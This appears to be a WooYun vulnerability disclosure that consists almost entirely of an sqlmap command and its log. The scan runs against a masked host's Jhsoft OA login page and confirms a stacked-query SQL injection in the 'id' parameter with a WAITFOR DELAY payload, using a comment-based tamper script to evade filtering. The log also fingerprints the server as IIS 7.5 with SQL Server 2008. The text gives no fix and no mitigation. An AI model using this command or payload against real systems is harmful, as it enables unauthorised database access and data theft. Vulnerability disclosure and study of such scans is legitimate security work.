WooYun.org

python sqlmap.py -u "http://**.**.**.**/c6/Jhsoft.Web.login/newview.aspx?id=1" --tamper tamper/space2comment.py

[11:55:58] [INFO] loading tamper script 'space2comment'
[11:55:58] [INFO] testing connection to the target URL
[11:55:58] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS
[11:55:58] [INFO] testing if the target URL is stable
[11:55:59] [INFO] target URL is stable
[11:55:59] [INFO] testing if GET parameter 'id' is dynamic
[11:55:59] [WARNING] GET parameter 'id' does not appear dynamic
[11:55:59] [WARNING] heuristic (basic) test shows that GET parameter 'id' might not be injectable
[11:55:59] [INFO] testing for SQL injection on GET parameter 'id'
[11:55:59] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[11:56:01] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[11:56:01] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[11:56:02] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[11:56:03] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[11:56:04] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[11:56:04] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[11:56:05] [INFO] testing 'MySQL inline queries'
[11:56:05] [INFO] testing 'PostgreSQL inline queries'
[11:56:05] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[11:56:05] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[11:56:06] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[11:56:06] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[11:56:17] [INFO] GET parameter 'id' seems to be 'Microsoft SQL Server/Sybase stacked queries (comment)' injectable 
it looks like the back-end DBMS is '['Microsoft SQL Server', 'Sybase']'. Do you want to skip test 
for the remaining tests, do you want to include all tests for '['Microsoft SQL Server', 'Sybase']' extending provided level (1) and risk (1) values? [Y/n] 
[11:56:35] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[11:56:35] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[11:56:38] [INFO] checking if the injection point on GET parameter 'id' is a false positive
[11:56:49] [INFO] heuristics detected web page charset 'utf-8'
[11:56:49] [WARNING] parameter length constrainting mechanism detected (e.g. Suhosin patch). Potential problems in enumeration phase can be expected
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] 
sqlmap identified the following injection point(s) with a total of 85 HTTP(s) requests:
---
Parameter: id (GET)
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: id=1;WAITFOR DELAY '0:0:5'--
---
[11:57:21] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
[11:57:21] [INFO] testing Microsoft SQL Server
[11:57:21] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors 
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] 
[11:57:31] [INFO] confirming Microsoft SQL Server
[11:57:42] [INFO] adjusting time delay to 1 second due to good response times
[11:57:43] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008